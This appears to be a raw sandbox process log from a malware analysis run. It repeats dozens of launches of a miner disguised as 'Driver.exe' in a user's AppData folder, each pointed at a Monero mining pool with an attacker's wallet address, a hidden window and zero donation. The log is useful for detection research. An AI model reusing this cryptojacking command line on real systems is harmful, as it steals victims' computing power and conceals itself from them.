"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3376

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3540

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:1840

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:1128

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3692

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3824

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3916

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2916

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2416

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3864

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3568

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3248

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:1852

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2080

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3852

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:1584

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2456

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2228

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3720

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3464

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2104

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3112

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3528

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:1228

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2460

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2188

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3280

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2300

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3468

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3196

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:868

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3780

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3528

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:4068

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3032

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2428

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3676

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3448

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2256

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:4040

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3528

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3968

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3188

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2384

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3304

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:804

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3824

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3416

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3876

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:588

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3140

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3316

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3664

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2716

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3424

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3648

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2856

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:1884

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3236

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2568

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3240

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2980

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3528

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:1884

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3044

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3744

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3824

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2136

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:684

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3084

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:4032

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3328

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
